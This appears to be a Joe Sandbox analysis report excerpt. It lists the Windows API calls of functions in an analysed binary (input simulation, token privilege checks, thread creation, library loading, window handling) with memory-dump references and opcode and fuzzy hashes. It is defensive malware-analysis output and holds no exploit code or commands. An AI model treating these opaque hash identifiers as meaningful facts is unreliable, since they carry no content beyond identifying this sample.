                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00CB5352
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB5375
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CB5382
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00CB53A8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                                      • String ID:
                                                                      • API String ID: 3340791633-0
                                                                      • Opcode ID: 11205848080a7cc8b7307cc2f7b437c325a038dbb3d85430a1ce1fa510017287
                                                                      • Instruction ID: f6f18952b6e9982c441bc9e6cb64f4c8479c028f81e569b71370310cb4815419
                                                                      • Opcode Fuzzy Hash: 11205848080a7cc8b7307cc2f7b437c325a038dbb3d85430a1ce1fa510017287
                                                                      • Instruction Fuzzy Hash: B431A334A55A08EFEB309E14CC55FE977E5AB04390F584102FA21963F1C7F59E80EB52
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00C8ABF1
                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C8AC0D
                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C8AC74
                                                                      • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00C8ACC6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 89bcb66e2ab25335401a0153857a14c3f92a06057e196ee1706344424a206ddb
                                                                      • Instruction ID: 84374333fcb9ddf3ec7f0b4cc0e1c1f29efe5baeb716b5613f32056187180ba2
                                                                      • Opcode Fuzzy Hash: 89bcb66e2ab25335401a0153857a14c3f92a06057e196ee1706344424a206ddb
                                                                      • Instruction Fuzzy Hash: A9312B70A007186FFF35EB698C04BFE7BA5AB49318F08431BE495521D1C3768E85975A
                                                                      APIs
                                                                      • ClientToScreen.USER32(?,?), ref: 00CB769A
                                                                      • GetWindowRect.USER32(?,?), ref: 00CB7710
                                                                      • PtInRect.USER32(?,?,00CB8B89), ref: 00CB7720
                                                                      • MessageBeep.USER32(00000000), ref: 00CB778C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: a19e3e8fbe9ceed77f939153740a62e0d42815e03056df53bdd21442a93eb24f
                                                                      • Instruction ID: 4c1a1293e03dd773ef55b33e31cf9b02a390a4437ad5c86fb7de93f869b10a97
                                                                      • Opcode Fuzzy Hash: a19e3e8fbe9ceed77f939153740a62e0d42815e03056df53bdd21442a93eb24f
                                                                      • Instruction Fuzzy Hash: 3E416B34A09214DFCB12CF59C894FED77F5FB89314F1942A8EC25AB261CB71AA41CB90
                                                                      APIs
                                                                        • Part of subcall function 00C27620: _wcslen.LIBCMT ref: 00C27625
                                                                      • _wcslen.LIBCMT ref: 00C8DFCB
                                                                      • _wcslen.LIBCMT ref: 00C8DFE2
                                                                      • _wcslen.LIBCMT ref: 00C8E00D
                                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00C8E018
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$ExtentPoint32Text
                                                                      • String ID:
                                                                      • API String ID: 3763101759-0
                                                                      • Opcode ID: 9b2bfc8f1f52c4ac3e575ede6129764035db462c12d75ff6fcf7de61286496a5
                                                                      • Instruction ID: 61bb42573b90de8680886a1f93ffde38831e64cae6343a19a08e256d68990a28
                                                                      • Opcode Fuzzy Hash: 9b2bfc8f1f52c4ac3e575ede6129764035db462c12d75ff6fcf7de61286496a5
                                                                      • Instruction Fuzzy Hash: C421D171900214AFCB20AFA8D881BAEB7F8EF45724F144068E905BB285D7709E41EBA1
                                                                      APIs
                                                                      • GetFileAttributesW.KERNEL32(?,00CBCB68), ref: 00C8D2FB
                                                                      • GetLastError.KERNEL32 ref: 00C8D30A
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C8D319
                                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00CBCB68), ref: 00C8D376
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 2267087916-0
                                                                      • Opcode ID: 939b612ac445e158af4c902d9bb0a09376c17e7503cf9e55027ca44ead99ebec
                                                                      • Instruction ID: 4f81beb62d63a4a2c1b35ee8f3ec06b1b067fccc62654d18a4b5701e98df4893
                                                                      • Opcode Fuzzy Hash: 939b612ac445e158af4c902d9bb0a09376c17e7503cf9e55027ca44ead99ebec
                                                                      • Instruction Fuzzy Hash: 132191705043119F8700EF28D8815AEB7F4EE5A328F104A2DF4AAC72E1D730DA45CB97
                                                                      APIs
                                                                        • Part of subcall function 00C81014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C8102A
                                                                        • Part of subcall function 00C81014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C81036
                                                                        • Part of subcall function 00C81014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C81045
                                                                        • Part of subcall function 00C81014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C8104C
                                                                        • Part of subcall function 00C81014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C81062
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C815BE
                                                                      • _memcmp.LIBVCRUNTIME ref: 00C815E1
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C81617
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C8161E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                      • String ID:
                                                                      • API String ID: 1592001646-0
                                                                      • Opcode ID: 23899468c4139f065ba0ea1e2ec6fd023f533c2541bebf129f3eef6ff32c211c
                                                                      • Instruction ID: 1702600f4c9a0a5f5b16af652c9c77881a373e3996a15f75d18e33a7ab01b310
                                                                      • Opcode Fuzzy Hash: 23899468c4139f065ba0ea1e2ec6fd023f533c2541bebf129f3eef6ff32c211c
                                                                      • Instruction Fuzzy Hash: 84214A71E00109EFDB10EFA4C945BEEB7F8FF44359F184459E891AB241E730AA46DBA4
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • GetCursorPos.USER32(?), ref: 00CB9001
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00C77711,?,?,?,?,?), ref: 00CB9016
                                                                      • GetCursorPos.USER32(?), ref: 00CB905E
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00C77711,?,?,?), ref: 00CB9094
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                      • String ID:
                                                                      • API String ID: 2864067406-0
                                                                      • Opcode ID: addecab5eb42efa9c88dc5dd8a887116f84d91b81b36704e236ba4ee8ad93faa
                                                                      • Instruction ID: 1dc229fd2e308fe4cf531e887b1fdf40ba8c8458c2cce9ca3e65a0ae444e469b
                                                                      • Opcode Fuzzy Hash: addecab5eb42efa9c88dc5dd8a887116f84d91b81b36704e236ba4ee8ad93faa
                                                                      • Instruction Fuzzy Hash: CB219F35600018EFCB259F94D898FFE7BB9EB4A361F044155FA1547261C7719A50EB60
                                                                      APIs
                                                                        • Part of subcall function 00C88D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00C8790A,?,000000FF,?,00C88754,00000000,?,0000001C,?,?), ref: 00C88D8C
                                                                        • Part of subcall function 00C88D7D: lstrcpyW.KERNEL32(00000000,?,?,00C8790A,?,000000FF,?,00C88754,00000000,?,0000001C,?,?,00000000), ref: 00C88DB2
                                                                        • Part of subcall function 00C88D7D: lstrcmpiW.KERNEL32(00000000,?,00C8790A,?,000000FF,?,00C88754,00000000,?,0000001C,?,?), ref: 00C88DE3
                                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00C88754,00000000,?,0000001C,?,?,00000000), ref: 00C87923
                                                                      • lstrcpyW.KERNEL32(00000000,?,?,00C88754,00000000,?,0000001C,?,?,00000000), ref: 00C87949
                                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C88754,00000000,?,0000001C,?,?,00000000), ref: 00C87984
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                      • String ID: cdecl
                                                                      • API String ID: 4031866154-3896280584
                                                                      • Opcode ID: a45012c7776a7c9f28d451448e641bc15f15fc220f912542ddb5465da6b2a25f
                                                                      • Instruction ID: 396a50b473ee59098d3ea7ad3d896d23ffa3674f7a27f039a136165770370fb0
                                                                      • Opcode Fuzzy Hash: a45012c7776a7c9f28d451448e641bc15f15fc220f912542ddb5465da6b2a25f
                                                                      • Instruction Fuzzy Hash: F411033A200242ABCF15BF39D844E7A77A9FF95394B50412AF842CB2A4FF31D901D7A5
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CB7D0B
                                                                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00CB7D2A
                                                                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00CB7D42
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C9B7AD,00000000), ref: 00CB7D6B
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID:
                                                                      • API String ID: 847901565-0
                                                                      • Opcode ID: 794542b85310248ca9826f5e35b3bd3f235cedf7e740632983e6c958c2e99456
                                                                      • Instruction ID: e7f1b3b0ed7e3fa5e510101ae60706d5c4cbe50bb71c88c4e948118aff639460
                                                                      • Opcode Fuzzy Hash: 794542b85310248ca9826f5e35b3bd3f235cedf7e740632983e6c958c2e99456
                                                                      • Instruction Fuzzy Hash: E2116D31615615AFCB109F68CC44BBA3BA5AF853A0F254728FC3AD72F0E7319A51DB90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00C81A47
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C81A59
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C81A6F
                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C81A8A
                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,?,00C4CFF9,00000000,00000004,00000000), ref: 00C4D218
                                                                      • GetLastError.KERNEL32 ref: 00C4D224
                                                                      • __dosmaperr.LIBCMT ref: 00C4D22B
                                                                      • ResumeThread.KERNEL32(00000000), ref: 00C4D249
                                                                      APIs
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C8E1FD
                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00C8E230
                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00C8E246
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00C8E24D
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • GetClientRect.USER32(?,?), ref: 00CB9F31
                                                                      • GetCursorPos.USER32(?), ref: 00CB9F3B
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB9F46
                                                                      • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00CB9F7A
                                                                      APIs
                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00C2604C
                                                                      • GetStockObject.GDI32(00000011), ref: 00C26060
                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 00C2606A
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00C213C6,00000000,00000000,?,00C5301A,00C213C6,00000000,00000000,00000000,?,00C5328B,00000006,FlsSetValue), ref: 00C530A5
                                                                      • GetLastError.KERNEL32(?,00C5301A,00C213C6,00000000,00000000,00000000,?,00C5328B,00000006,FlsSetValue,00CC2290,FlsSetValue,00000000,00000364,?,00C52E46), ref: 00C530B1
                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00C5301A,00C213C6,00000000,00000000,00000000,?,00C5328B,00000006,FlsSetValue,00CC2290,FlsSetValue,00000000), ref: 00C530BF
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00C8747F
                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C87497
                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C874AC
                                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C874CA
                                                                      APIs
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C8ACD3,?,00008000), ref: 00C8B0C4
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C8ACD3,?,00008000), ref: 00C8B0E9
                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00C8ACD3,?,00008000), ref: 00C8B0F3
                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C8ACD3,?,00008000), ref: 00C8B126
                                                                      APIs
                                                                      • GetWindowRect.USER32(?,?), ref: 00CB7E33
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB7E4B
                                                                      • ScreenToClient.USER32(?,?), ref: 00CB7E6F
                                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CB7E8A
                                                                      APIs
                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C82DC5
                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00C82DD6
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00C82DDD
                                                                      • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C82DE4
                                                                      APIs
                                                                        • Part of subcall function 00C39639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C39693
                                                                        • Part of subcall function 00C39639: SelectObject.GDI32(?,00000000), ref: 00C396A2
                                                                        • Part of subcall function 00C39639: BeginPath.GDI32(?), ref: 00C396B9
                                                                        • Part of subcall function 00C39639: SelectObject.GDI32(?,00000000), ref: 00C396E2
                                                                      • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00CB8887
                                                                      • LineTo.GDI32(?,?,?), ref: 00CB8894
                                                                      • EndPath.GDI32(?), ref: 00CB88A4
                                                                      • StrokePath.GDI32(?), ref: 00CB88B2
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 00C81634
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C811D9), ref: 00C8163B
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C811D9), ref: 00C81648
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C811D9), ref: 00C8164F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: ce32d391f6325174f0a1299ad74313c28ef5dc95c7e97e98ce17dacf0d286144
                                                                      • Instruction ID: 71ae102eb1a226f425e4affd64f7c4c6eb233308ef4ad0499a9e31bd98a4e38d
                                                                      • Opcode Fuzzy Hash: ce32d391f6325174f0a1299ad74313c28ef5dc95c7e97e98ce17dacf0d286144
                                                                      • Instruction Fuzzy Hash: D7E08631601211DBD7202FA0AD4DB8B3BBCEF44795F184918F695C9090E6344541C764
                                                                      APIs
                                                                        • Part of subcall function 00C27620: _wcslen.LIBCMT ref: 00C27625
                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C94ED4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Connection_wcslen
                                                                      • String ID: *$LPT
                                                                      • API String ID: 1725874428-3443410124
                                                                      • Opcode ID: 62603628adfa1dea83211b8c9bfcc543682c4aa3c67bdeaba94d61dc84978ed6
                                                                      • Instruction ID: 00014f47dbe0a50d65437e3cb1b390a5d5d37cc8de3c0f641da928015057ffbe
                                                                      • Opcode Fuzzy Hash: 62603628adfa1dea83211b8c9bfcc543682c4aa3c67bdeaba94d61dc84978ed6
                                                                      • Instruction Fuzzy Hash: 36916275A002159FCB18DF98C4C8EAABBF5BF44304F148099E41A9F762D735EE86CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      • Opcode ID: e1a5b8ec31f5ff3c2b260c0667bf1900e83d3ddc748ced8d149c54aced0605f2
                                                                      • Instruction ID: f021e469c420ab02482364e8826107c7a1b45d77d0d237517df7fcdf40e3c196
                                                                      • Opcode Fuzzy Hash: e1a5b8ec31f5ff3c2b260c0667bf1900e83d3ddc748ced8d149c54aced0605f2
                                                                      • Instruction Fuzzy Hash: 2B512376500346DFDB19DF68C481ABA7BA8EF19310F248095FCA59B2D0D7349E52DBA0
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00C3F2A2
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C3F2BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: 13c655d19ca53e4e0f79c1423a75ec3c27161209c99d234a530f31b066cff04b
                                                                      • Instruction ID: 0b7190e95f1b18c1b0312fbfcbcdc392ea08fce9ed6c5a3b61feb012188a6ea6
                                                                      • Opcode Fuzzy Hash: 13c655d19ca53e4e0f79c1423a75ec3c27161209c99d234a530f31b066cff04b
                                                                      • Instruction Fuzzy Hash: 1D512372408744ABD320AF54E886BAFBBF8FB84300F81895DF1D9411A5EB719529CB66
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00CA57E0
                                                                      • _wcslen.LIBCMT ref: 00CA57EC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
